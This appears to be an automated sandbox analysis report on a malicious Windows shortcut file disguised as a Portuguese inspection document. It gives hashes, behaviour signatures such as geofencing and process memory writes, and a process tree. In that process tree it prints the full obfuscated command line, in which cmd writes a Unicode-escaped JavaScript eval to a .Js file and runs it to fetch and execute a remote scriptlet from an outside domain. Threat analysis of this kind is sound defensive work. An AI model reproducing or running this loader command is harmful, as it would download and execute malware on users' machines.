Overview

overview

8

Static

static

1

CBM_Vistor...Nk.lnk

windows7-x64

3

CBM_Vistor...Nk.lnk

windows10-2004-x64

8

Analysis

  • max time kernel
    135s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/05/2023, 05:52

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    CBM_Vistoria82783048885553654586815.699179.38512.lNk.lnk

  • Size

    1KB

  • MD5

    b7403fafb97aa69f0a86293526092727

  • SHA1

    4b3c92feebd81f1ad2020347ad8c02875a381e25

  • SHA256

    103d4b2be6c41f858cc52802535ea78502f5fab702704fc39e67a2c7d1c565ee

  • SHA512

    855d69184902233344de40d9c9115bb9598a7ce6986878f24a25bb59d364354611a78282480b0cc2e4748b2a77e48d153a39247fd49d6e0e17b93b4edab092fe

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\CBM_Vistoria82783048885553654586815.699179.38512.lNk.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3372
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "md C:\U6aGT85\>nul 2>&1 &&s^eT XYXC=C:\U6aGT85\^U6aGT85.^Js&&echo eval('\u0076\u0061\u0072\u0020\u0043\u0054\u0059\u0045\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0054\u0059\u0045\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022\u003a\u0068\u0022\u003b\u0045\u0054\u0059\u0045\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043\u0054\u0059\u0045\u002b\u0044\u0054\u0059\u0045\u002b\u0045\u0054\u0059\u0045\u002b\u0022\u002f\u002f\u0035\u0076\u0065\u0072\u0031\u0074\u0070\u0065\u006f\u0038\u0074\u002e\u006c\u0069\u0063\u0065\u006e\u0063\u0069\u0061\u006d\u0065\u006e\u0074\u006f\u006d\u0065\u0065\u006e\u0074\u0072\u0065\u0067\u0061\u002e\u0063\u006f\u006d\u002f\u003f\u0031\u002f\u0022\u0029\u003b'); >!XYXC!&&ca^ll !XYXC!"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4528
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /V/D/c "md C:\U6aGT85\>nul 2>&1 &&s^eT XYXC=C:\U6aGT85\^U6aGT85.^Js&&echo eval('\u0076\u0061\u0072\u0020\u0043\u0054\u0059\u0045\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0054\u0059\u0045\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022\u003a\u0068\u0022\u003b\u0045\u0054\u0059\u0045\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043\u0054\u0059\u0045\u002b\u0044\u0054\u0059\u0045\u002b\u0045\u0054\u0059\u0045\u002b\u0022\u002f\u002f\u0035\u0076\u0065\u0072\u0031\u0074\u0070\u0065\u006f\u0038\u0074\u002e\u006c\u0069\u0063\u0065\u006e\u0063\u0069\u0061\u006d\u0065\u006e\u0074\u006f\u006d\u0065\u0065\u006e\u0074\u0072\u0065\u0067\u0061\u002e\u0063\u006f\u006d\u002f\u003f\u0031\u002f\u0022\u0029\u003b'); >!XYXC!&&ca^ll !XYXC!"
        3⤵
        • Checks computer location settings
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:344
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\U6aGT85\U6aGT85.Js"
          4⤵
          • Blocklisted process makes network request
          PID:3596

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\U6aGT85\U6aGT85.Js
          Filesize

          744B

          MD5

          ef993e214a66385f94e0a06c3238928b

          SHA1

          92d62af02eeff228fba195b9ae44341db339da40

          SHA256

          ec7e5d0ec6234b4d8c46059a3d20e77ae459d9f3fefc56b8fd8f81b2d8b50949

          SHA512

          b9164f55a87d29d4b3c719ac744d255fc7f02d4c1c67da2b4ec7b6dce5b026e48622658850c4c30748997efc8e934095bac95f4f59ca2226f482b77d30a577df

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\CBM_Vistoria82783048885553654586815.699179.38512.lNk.lnk
          Filesize

          2KB

          MD5

          6b7897eb1f4d8ece7f21299c20627070

          SHA1

          a263ee95b8f500edf2c52824959561b3086aa66d

          SHA256

          774a2766d660cdb256585e1d241e88f36cbb5f481367aaf2c09b17b1bcbbbe5f

          SHA512

          7c88a5670fd7135f31deafbe6cea5cbc00d34ac87a1b12a164036a1758bafb678eca05c4ae8ee88494bde60cfc63916d806d4ab3a0152307481ea68471247358

          Download Submit